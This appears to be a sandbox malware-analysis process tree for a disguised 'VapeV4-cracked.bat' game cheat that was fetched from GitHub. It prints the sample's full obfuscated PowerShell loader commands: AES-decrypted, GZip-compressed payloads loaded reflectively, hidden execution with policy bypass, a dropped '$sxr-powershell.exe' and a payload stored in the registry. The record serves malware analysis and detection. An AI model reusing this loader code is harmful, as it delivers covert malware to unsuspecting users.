C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8451f46f8,0x7ff8451f4708,0x7ff8451f47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5180 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:13⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\VapeV4-cracked.bat" "2⤵
- Drops file in Windows directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net.exenet session3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵
-
C:\Users\Admin\Desktop\VapeV4-cracked.bat.exe"VapeV4-cracked.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function DlXiw($jnfYj){ $QpJJS=[System.Security.Cryptography.Aes]::Create(); $QpJJS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QpJJS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QpJJS.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hq6nkjA2Agpp6rzE5ZH6qEdc87VQUGJSupueX0Nn2kI='); $QpJJS.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yCS6Miz0G0oYyOqVwRYRZw=='); $GHgia=$QpJJS.CreateDecryptor(); $return_var=$GHgia.TransformFinalBlock($jnfYj, 0, $jnfYj.Length); $GHgia.Dispose(); $QpJJS.Dispose(); $return_var;}function cuzkB($jnfYj){ $vMlyC=New-Object System.IO.MemoryStream(,$jnfYj); $jWECR=New-Object System.IO.MemoryStream; $xNVjy=New-Object System.IO.Compression.GZipStream($vMlyC, [IO.Compression.CompressionMode]::Decompress); $xNVjy.CopyTo($jWECR); $xNVjy.Dispose(); $vMlyC.Dispose(); $jWECR.Dispose(); $jWECR.ToArray();}function htDyt($jnfYj,$nQBBf){ $ryoCK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$jnfYj); $HgyeT=$ryoCK.EntryPoint; $HgyeT.Invoke($null, $nQBBf);}$zXORP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\VapeV4-cracked.bat').Split([Environment]::NewLine);foreach ($pJAbE in $zXORP) { if ($pJAbE.StartsWith('SEROXEN')) { $VXJBB=$pJAbE.Substring(7); break; }}$pogEs=[string[]]$VXJBB.Split('\');$WRGtE=cuzkB (DlXiw ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pogEs[0])));$HmueV=cuzkB (DlXiw ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pogEs[1])));htDyt $HmueV (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));htDyt $WRGtE (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function LmYrU($GlYrr){ $VzjlJ=[System.Security.Cryptography.Aes]::Create(); $VzjlJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VzjlJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VzjlJ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c='); $VzjlJ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A=='); $TOsgU=$VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')(); $PsSSM=$TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlYrr, 0, $GlYrr.Length); $TOsgU.Dispose(); $VzjlJ.Dispose(); $PsSSM;}function QfZmt($GlYrr){ $nVolF=New-Object System.IO.MemoryStream(,$GlYrr); $VTMYb=New-Object System.IO.MemoryStream; $nmqaP=New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::Decompress); $nmqaP.CopyTo($VTMYb); $nmqaP.Dispose(); $nVolF.Dispose(); $VTMYb.Dispose(); $VTMYb.ToArray();}function szqwG($GlYrr,$NEZvQ){ $ewoEL=[System.Reflection.Assembly]::Load([byte[]]$GlYrr); $HogUs=$ewoEL.EntryPoint; $HogUs.Invoke($null, $NEZvQ);}$VzjlJ1 = New-Object System.Security.Cryptography.AesManaged;$VzjlJ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$RyjbI = $VzjlJ1.('rotpyrceDetaerC'[-1..-15] -join '')();$WeCRB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rBC5HeHuGbR2ImUlWvTjSQ==');$WeCRB = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB, 0, $WeCRB.Length);$WeCRB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB);$bcFyd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BeaC7G+8Sm7rfYF70uj8+9TzFxmZEiUlsh2TM2xk1+A=');$bcFyd = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bcFyd, 0, $bcFyd.Length);$bcFyd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bcFyd);$yAHNg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ws3lAmjqLeV7orzZ/YWfPA==');$yAHNg = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yAHNg, 0, $yAHNg.Length);$yAHNg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yAHNg);$GzAMm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9YHl/b5X5ofe5n03Kerdh4fWRBxD0pX/SyLJUbzj2faRL6Qv9I9FCsrMwAk51NtgwviquEUBf774rXrYKUifdVSqSsjl2PnjYtC2Yif3g5oJQam2JhnRb/z9GIuB4etIiFGPLnhL7UgGxYr7DnbGDSi047eI/se79omdwxjPoPB7UTuOy824vLyL3bFw2frZJivPSph2HigUMsOKrI62VbZI6JY7T7bv8UjzSWfjrUhkZnJskkh5kcfdcX+A8XqeF/31RfDl5c5DHPnxu/BhJQmiutTpgmHEZ8pxw8KX7/WpeWJCCD9sD6u8SmgoJdMtkYDfo3NQnikVbk0RJeEDo5UR5p3qRCnPLBer93JUiV2p08BlQVV05Qsbgs+fHf8snJ0RpUq+FXqVWV/6CuV8UnlIPNfRNLCyAi25F5kCS8E=');$GzAMm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GzAMm, 0, $GzAMm.Length);$GzAMm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GzAMm);$AoGah = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VPLPBd2r41JicJsw8HEb8g==');$AoGah = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AoGah, 0, $AoGah.Length);$AoGah = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AoGah);$lgDvm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mr61btMD3+k5y48OeMz7Iw==');$lgDvm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lgDvm, 0, $lgDvm.Length);$lgDvm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lgDvm);$tqVXJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0cpebOCRE4vOUJtETKRgLw==');$tqVXJ = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tqVXJ, 0, $tqVXJ.Length);$tqVXJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tqVXJ);$LPaqK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4UbNTOvYCuJ3aS365B1ljg==');$LPaqK = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LPaqK, 0, $LPaqK.Length);$LPaqK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LPaqK);$EGznT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oQJLBF9lcvxb1b9b+hMFxQ==');$EGznT = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EGznT, 0, $EGznT.Length);$EGznT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EGznT);$WeCRB0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0bvuVlAbojoct73Wd6OFLQ==');$WeCRB0 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB0, 0, $WeCRB0.Length);$WeCRB0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB0);$WeCRB1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fnpxdZjqORDfNgWX1H/Pfw==');$WeCRB1 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB1, 0, $WeCRB1.Length);$WeCRB1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB1);$WeCRB2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HVF+C560xar/hFyTSm9+FQ==');$WeCRB2 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB2, 0, $WeCRB2.Length);$WeCRB2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB2);$WeCRB3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9OSzDNwsyhvLGrn+9PwCOw==');$WeCRB3 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB3, 0, $WeCRB3.Length);$WeCRB3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB3);$RyjbI.Dispose();$VzjlJ1.Dispose();if (@(get-process -ea silentlycontinue $WeCRB3).count -gt 1) {exit};$hbRRw = [Microsoft.Win32.Registry]::$LPaqK.$tqVXJ($WeCRB).$lgDvm($bcFyd);$XRetW=[string[]]$hbRRw.Split('\');$YrtyT=QfZmt(LmYrU([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[1])));szqwG $YrtyT (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$hYivz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[0]);$VzjlJ = New-Object System.Security.Cryptography.AesManaged;$VzjlJ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$TOsgU = $VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYivz = $TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYivz, 0, $hYivz.Length);$TOsgU.Dispose();$VzjlJ.Dispose();$nVolF = New-Object System.IO.MemoryStream(, $hYivz);$VTMYb = New-Object System.IO.MemoryStream;$nmqaP = New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::$WeCRB1);$nmqaP.$EGznT($VTMYb);$nmqaP.Dispose();$nVolF.Dispose();$VTMYb.Dispose();$hYivz = $VTMYb.ToArray();$iouAf = $GzAMm | IEX;$ewoEL = $iouAf::$WeCRB2($hYivz);$HogUs = $ewoEL.EntryPoint;$HogUs.$WeCRB0($null, (, [string[]] ($yAHNg)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3416).WaitForExit();[System.Threading.Thread]::Sleep(5000); function LmYrU($GlYrr){ $VzjlJ=[System.Security.Cryptography.Aes]::Create(); $VzjlJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VzjlJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VzjlJ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c='); $VzjlJ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A=='); $TOsgU=$VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')(); $PsSSM=$TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlYrr, 0, $GlYrr.Length); $TOsgU.Dispose(); $VzjlJ.Dispose(); $PsSSM;}function QfZmt($GlYrr){ $nVolF=New-Object System.IO.MemoryStream(,$GlYrr); $VTMYb=New-Object System.IO.MemoryStream; $nmqaP=New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::Decompress); $nmqaP.CopyTo($VTMYb); $nmqaP.Dispose(); $nVolF.Dispose(); $VTMYb.Dispose(); $VTMYb.ToArray();}function szqwG($GlYrr,$NEZvQ){ $ewoEL=[System.Reflection.Assembly]::Load([byte[]]$GlYrr); $HogUs=$ewoEL.EntryPoint; $HogUs.Invoke($null, $NEZvQ);}$VzjlJ1 = New-Object System.Security.Cryptography.AesManaged;$VzjlJ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$RyjbI = $VzjlJ1.('rotpyrceDetaerC'[-1..-15] -join '')();$WeCRB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rBC5HeHuGbR2ImUlWvTjSQ==');$WeCRB = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB, 0, $WeCRB.Length);$WeCRB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB);$bcFyd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BeaC7G+8Sm7rfYF70uj8+9TzFxmZEiUlsh2TM2xk1+A=');$bcFyd = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bcFyd, 0, $bcFyd.Length);$bcFyd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bcFyd);$yAHNg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ws3lAmjqLeV7orzZ/YWfPA==');$yAHNg = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yAHNg, 0, $yAHNg.Length);$yAHNg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yAHNg);$GzAMm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9YHl/b5X5ofe5n03Kerdh4fWRBxD0pX/SyLJUbzj2faRL6Qv9I9FCsrMwAk51NtgwviquEUBf774rXrYKUifdVSqSsjl2PnjYtC2Yif3g5oJQam2JhnRb/z9GIuB4etIiFGPLnhL7UgGxYr7DnbGDSi047eI/se79omdwxjPoPB7UTuOy824vLyL3bFw2frZJivPSph2HigUMsOKrI62VbZI6JY7T7bv8UjzSWfjrUhkZnJskkh5kcfdcX+A8XqeF/31RfDl5c5DHPnxu/BhJQmiutTpgmHEZ8pxw8KX7/WpeWJCCD9sD6u8SmgoJdMtkYDfo3NQnikVbk0RJeEDo5UR5p3qRCnPLBer93JUiV2p08BlQVV05Qsbgs+fHf8snJ0RpUq+FXqVWV/6CuV8UnlIPNfRNLCyAi25F5kCS8E=');$GzAMm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GzAMm, 0, $GzAMm.Length);$GzAMm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GzAMm);$AoGah = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VPLPBd2r41JicJsw8HEb8g==');$AoGah = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AoGah, 0, $AoGah.Length);$AoGah = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AoGah);$lgDvm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mr61btMD3+k5y48OeMz7Iw==');$lgDvm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lgDvm, 0, $lgDvm.Length);$lgDvm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lgDvm);$tqVXJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0cpebOCRE4vOUJtETKRgLw==');$tqVXJ = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tqVXJ, 0, $tqVXJ.Length);$tqVXJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tqVXJ);$LPaqK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4UbNTOvYCuJ3aS365B1ljg==');$LPaqK = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LPaqK, 0, $LPaqK.Length);$LPaqK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LPaqK);$EGznT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oQJLBF9lcvxb1b9b+hMFxQ==');$EGznT = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EGznT, 0, $EGznT.Length);$EGznT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EGznT);$WeCRB0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0bvuVlAbojoct73Wd6OFLQ==');$WeCRB0 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB0, 0, $WeCRB0.Length);$WeCRB0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB0);$WeCRB1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fnpxdZjqORDfNgWX1H/Pfw==');$WeCRB1 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB1, 0, $WeCRB1.Length);$WeCRB1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB1);$WeCRB2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HVF+C560xar/hFyTSm9+FQ==');$WeCRB2 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB2, 0, $WeCRB2.Length);$WeCRB2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB2);$WeCRB3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9OSzDNwsyhvLGrn+9PwCOw==');$WeCRB3 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB3, 0, $WeCRB3.Length);$WeCRB3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB3);$RyjbI.Dispose();$VzjlJ1.Dispose();if (@(get-process -ea silentlycontinue $WeCRB3).count -gt 1) {exit};$hbRRw = [Microsoft.Win32.Registry]::$LPaqK.$tqVXJ($WeCRB).$lgDvm($bcFyd);$XRetW=[string[]]$hbRRw.Split('\');$YrtyT=QfZmt(LmYrU([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[1])));szqwG $YrtyT (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$hYivz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[0]);$VzjlJ = New-Object System.Security.Cryptography.AesManaged;$VzjlJ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$TOsgU = $VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYivz = $TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYivz, 0, $hYivz.Length);$TOsgU.Dispose();$VzjlJ.Dispose();$nVolF = New-Object System.IO.MemoryStream(, $hYivz);$VTMYb = New-Object System.IO.MemoryStream;$nmqaP = New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::$WeCRB1);$nmqaP.$EGznT($VTMYb);$nmqaP.Dispose();$nVolF.Dispose();$VTMYb.Dispose();$hYivz = $VTMYb.ToArray();$iouAf = $GzAMm | IEX;$ewoEL = $iouAf::$WeCRB2($hYivz);$HogUs = $ewoEL.EntryPoint;$HogUs.$WeCRB0($null, (, [string[]] ($yAHNg)))5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
